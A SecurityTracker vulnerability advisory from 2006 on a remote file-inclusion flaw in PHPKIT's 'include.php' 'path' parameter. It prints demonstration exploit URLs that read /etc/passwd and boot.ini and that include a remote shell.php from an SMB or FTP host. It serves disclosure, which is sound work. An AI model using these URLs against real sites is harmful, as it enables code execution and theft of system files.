SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   PHPKIT Vendors:   phpkit.de
PHPKIT 'include.php' Include File Bug Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015640
SecurityTracker URL:  http://securitytracker.com/id/1015640
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 16 2006
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.6.1 release 2 and prior versions
Description:   rgod reported a vulnerability in PHPKIT. A remote user can execute arbitrary code on the target system. A remote user can view files on the target system.

The 'include.php' script does not properly validate user-supplied input in the 'path' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from the local system. The PHP code, including operating system commands, will run with the privileges of the target web service.

Some demonstration exploit URLs are provided:

http://[target]/[path]/include.php?path=c:\[path_to]\test.php
http://[target]/[path]/include.php?path=/[path_to]/test.php

If magic_quotes_gpc is disabled, a remote user can view files on the target system. Some demonstration exploit URLs are provided:

http://[target]/[path]/include.php?path=/etc/passwd%00.php
http://[target]/[path]/include.php?path=c:\boot.ini%00.php

If allow_url_fopen is enabled, a remote user can cause PHP code from a remote Samba or FTP location to be included and executed.

Some demonstration exploit URLs are provided:

http://[target]/[path]/include.php?path=\\192.168.1.2\c\shell.php

http://[target]/[path]/include.php?path=ftps://username:password@somehost/shell.php

The original advisory is available at:

http://retrogod.altervista.org/phpkit_161r2_incl_xpl.html

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can view files on the target system.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpkit.de/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PHPKit <= v.1.6.1 release 2 remote code execution

http://retrogod.altervista.org/phpkit_161r2_incl_xpl.html

rgod
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC